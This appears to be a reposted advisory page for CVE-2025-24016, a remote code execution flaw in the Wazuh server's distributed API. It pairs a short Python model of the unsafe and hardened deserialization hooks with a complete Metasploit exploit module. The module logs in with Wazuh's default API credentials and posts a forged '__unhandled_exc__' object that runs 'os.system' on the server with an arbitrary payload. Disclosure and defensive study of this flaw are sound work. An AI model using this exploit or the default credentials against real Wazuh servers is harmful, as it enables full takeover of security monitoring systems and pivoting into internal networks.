Wazuh server remote code execution caused by an unsafe deserialization vulnerability

Vulnerability information

Vulnerability name: Wazuh server remote code execution caused by an unsafe deserialization vulnerability

Vulnerability ID:

  • CVE: CVE-2025-24016

Vulnerability type: Deserialization

Severity: High

Description: Wazuh is a free and open-source platform for threat prevention, detection and response. It is widely deployed in enterprise environments as part of a security information and event management (SIEM) solution, where it helps organizations collect, monitor and analyze security events; many organizations choose it for its feature set and flexibility.

The vulnerability lies in the Wazuh server's distributed API (DAPI). DAPI parameters are serialized as JSON and deserialized by `as_wazuh_object` (in `framework/wazuh/core/cluster/common.py`), which does not sufficiently validate the dictionaries it reconstructs. An attacker who can inject an unsanitized dictionary into a DAPI request or response can forge an unhandled-exception object (`__unhandled_exc__`) whose `__class__` and `__args__` fields are evaluated and called during deserialization, and thereby execute arbitrary Python code on the server. Because the trigger is a JSON structure rather than a specific endpoint, every path on which such a dictionary reaches the deserializer is an attack surface.
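The pattern described above, reduced to a runnable model (an added example, not Wazuh's own code and not its actual patch): a JSON `object_hook` that turns a forged `__unhandled_exc__` dictionary into a call of an attacker-chosen name, beside a hardened hook that only resolves names from a fixed allow-list of exception classes. Assumptions: the unsafe hook resolves `__class__` with `eval()` against the deserializing module's namespace (modelled here by an explicit dict containing `os` and `subprocess`), and `WazuhInternalError` is a hypothetical placeholder for an application exception class. The attacker payload has the same shape the Metasploit module posts, but the injected command is harmless (it runs this interpreter to print a marker) so the effect is observable.

```python
"""Model of the CVE-2025-24016 deserialization pattern: unsafe hook vs. hardened hook.
Added example; simplified and not Wazuh's real implementation."""
import json
import os
import subprocess
import sys

# Assumption: in the unsafe variant, eval() runs against the module's own
# namespace, so anything that module imported is reachable by dotted name.
_MODULE_NAMESPACE = {"os": os, "subprocess": subprocess}


def vulnerable_hook(dct):
    """Object hook in the style the advisory describes (deliberately unsafe)."""
    if "__unhandled_exc__" in dct:
        exc = dct["__unhandled_exc__"]
        # Attacker-controlled text is evaluated, then called with attacker-controlled args.
        return eval(exc["__class__"], _MODULE_NAMESPACE)(*exc["__args__"])
    return dct


class WazuhInternalError(Exception):
    """Hypothetical stand-in for an application exception class."""


# Hardened variant: class names are looked up in a fixed table, never evaluated.
_ALLOWED_EXCEPTIONS = {
    "WazuhInternalError": WazuhInternalError,
    "ValueError": ValueError,
    "KeyError": KeyError,
}


def hardened_hook(dct):
    """Reconstruct only allow-listed exception classes; reject everything else."""
    if "__unhandled_exc__" in dct:
        exc = dct["__unhandled_exc__"]
        cls = _ALLOWED_EXCEPTIONS.get(exc.get("__class__"))
        args = exc.get("__args__", [])
        if cls is None or not isinstance(args, list):
            raise ValueError("refusing to deserialize unknown exception type")
        # Only build the exception object; the caller decides whether to raise it.
        return cls(*args)
    return dct


def deserialize(payload, hook):
    # json.loads calls the hook for every decoded dict, innermost first.
    return json.loads(payload, object_hook=hook)


def attacker_payload():
    """Constructed payload: same shape as the module's, harmless command."""
    return json.dumps({
        "__unhandled_exc__": {
            "__class__": "subprocess.check_output",
            "__args__": [[sys.executable, "-c", "print('pwned')"]],
        }
    })


def demo_vulnerable():
    # Returns the captured stdout of the injected command: proof of execution.
    return deserialize(attacker_payload(), vulnerable_hook)


def demo_hardened():
    # The same payload is rejected before any name resolution happens.
    try:
        deserialize(attacker_payload(), hardened_hook)
    except ValueError as err:
        return str(err)
    return "accepted"


def demo_legitimate():
    # A genuine serialized exception still round-trips through the hardened hook.
    legit = json.dumps({"__unhandled_exc__": {"__class__": "KeyError", "__args__": ["agent_id"]}})
    return deserialize(legit, hardened_hook)


if __name__ == "__main__":
    print(demo_vulnerable())        # b'pwned\n'
    print(demo_hardened())          # refusing to deserialize unknown exception type
    print(repr(demo_legitimate()))  # KeyError('agent_id')
```

The fix worth taking away is not "strip the `__unhandled_exc__` key" but "never turn attacker-supplied text into a callable": a lookup table bounds what can be instantiated, and anything outside it fails closed.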

The impact is severe: the attacker executes code remotely on the affected Wazuh server and can take full control of it, run arbitrary commands, read the sensitive data it holds, and use it as a pivot into the internal network. Exploitation does require API access: anyone holding Wazuh API credentials (including a compromised dashboard or another Wazuh server in the cluster) can trigger the flaw, and in certain configurations so can a compromised agent. The Metasploit module below authenticates to the Wazuh API (default port 55000, with credentials defaulting to `wazuh-wui` / `MyS3cr37P450r.*-`) and posts the forged dictionary to `/security/user/authenticate/run_as`. The vulnerability therefore threatens not just a single server but the security of the whole estate that server monitors.

Vendor: Wazuh

Product: Wazuh

Affected versions: 4.4.0 <= version < 4.9.1

Source: https://github.com/rapid7/metasploit-framework/blob/f6e0c43ed9bd896ae270edba836799c80e6e00ea/modules%2Fexploits%2Flinux%2Fhttp%2Fwazuh_auth_rce_cve_2025_24016.rb

Type: rapid7/metasploit-framework: GitHub issues

POC details


##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Wazuh server remote code execution caused by an unsafe deserialization vulnerability.',
        'Description' => %q{
          Wazuh is a free and open source platform used for threat prevention, detection, and response.
          Starting in version 4.4.0 and prior to version 4.9.1, an unsafe deserialization vulnerability
          allows for remote code execution on Wazuh servers. DistributedAPI parameters are serialized
          as JSON and deserialized using `as_wazuh_object` (in `framework/wazuh/core/cluster/common.py`).
          If an attacker manages to inject an unsanitized dictionary in DAPI request/response, they can
          forge an unhandled exception (`__unhandled_exc__`) to evaluate arbitrary python code.
          The vulnerability can be triggered by anybody with API access (compromised dashboard or Wazuh
          servers in the cluster) or, in certain configurations, even by a compromised agent.
        },
        'Author' => [
          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Metasploit module & default password weakness
          'DanielFi https://github.com/DanielFi', # Discovery
        ],
        'References' => [
          ['CVE', '2025-24016'],
          ['URL', 'https://github.com/wazuh/wazuh/security/advisories/GHSA-hcrc-79hj-m3qh'],
          ['URL', 'https://attackerkb.com/topics/xxx/cve-2025-24016']
        ],
        'License' => MSF_LICENSE,
        'Platform' => ['unix', 'linux'],
        'Privileged' => false,
        'Arch' => [ARCH_CMD],
        'Targets' => [
          [
            'Unix/Linux Command',
            {
              'Platform' => ['unix', 'linux'],
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2025-02-10',
        'DefaultOptions' => {
          'SSL' => true,
          'RPORT' => 55000
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
          'Reliability' => [REPEATABLE_SESSION]
        }
      )
    )
    register_options([
      OptString.new('TARGETURI', [true, 'Path to the wazuh manager', '/']),
      OptString.new('API_USER', [true, 'Wazuh API user', 'wazuh-wui']),
      OptString.new('API_PWD', [true, 'Wazuh API password', 'MyS3cr37P450r.*-'])
    ])
  end

  # get Wazuh API token
  # return token if API login is successful else nil
  def get_api_token
    auth = Base64.strict_encode64("#{datastore['API_USER']}:#{datastore['API_PWD']}")
    basic_auth = "Basic #{auth}"
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'security', 'user', 'authenticate'),
      'headers' => {
        'Authorization' => basic_auth.to_s
      }
    })
    return unless res&.code == 200 && res.body.include?('token')

    res_json = res.get_json_document
    res_json['data']['token'] unless res_json.blank?
  end

  # get the Wazuh version
  # return version if successful else nil
  def get_wazuh_version(api_token)
    api_auth = "Bearer #{api_token}"
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path),
      'headers' => {
        'Authorization' => api_auth.to_s
      }
    })
    return unless res&.code == 200 && res.body.include?('api_version')

    res_json = res.get_json_document
    res_json['data']['api_version'] unless res_json.blank?
  end

  # CVE-2025-24016: Command Injection leading to RCE via unsafe deserialization vulnerability
  def execute_command(cmd, _opts = {})
    # {"__unhandled_exc__":{"__class__": "os.system", "__args__": ["cmd"]}}
    post_data = {
      __unhandled_exc__:
        {
          __class__: 'os.system',
          __args__: [ cmd.to_s ]
        }
    }.to_json

    auth = Base64.strict_encode64("#{datastore['API_USER']}:#{datastore['API_PWD']}")
    basic_auth = "Basic #{auth}"
    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'security', 'user', 'authenticate', 'run_as'),
      'ctype' => 'application/json',
      'headers' => {
        'Authorization' => basic_auth.to_s
      },
      'data' => post_data.to_s
    })
  end

  def check
    # check Wazuh API access with the API credentials
    api_token = get_api_token
    return CheckCode::Unknown('Can not access the Wazuh API with provided credentials.') if api_token.nil?

    version = get_wazuh_version(api_token)
    return CheckCode::Detected('Can not determine the Wazuh version.') if version.nil?

    version = Rex::Version.new(version)
    unless version >= Rex::Version.new('4.4.0') && version < Rex::Version.new('4.9.1')
      return CheckCode::Safe("Wazuh version #{version}")
    end

    CheckCode::Appears("Wazuh version #{version}")
  end

  def exploit
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
    execute_command(payload.encoded)
  end
end



http://example.com/2025/07/16/github_3836851729/
Author
lianccc
Published
July 16, 2025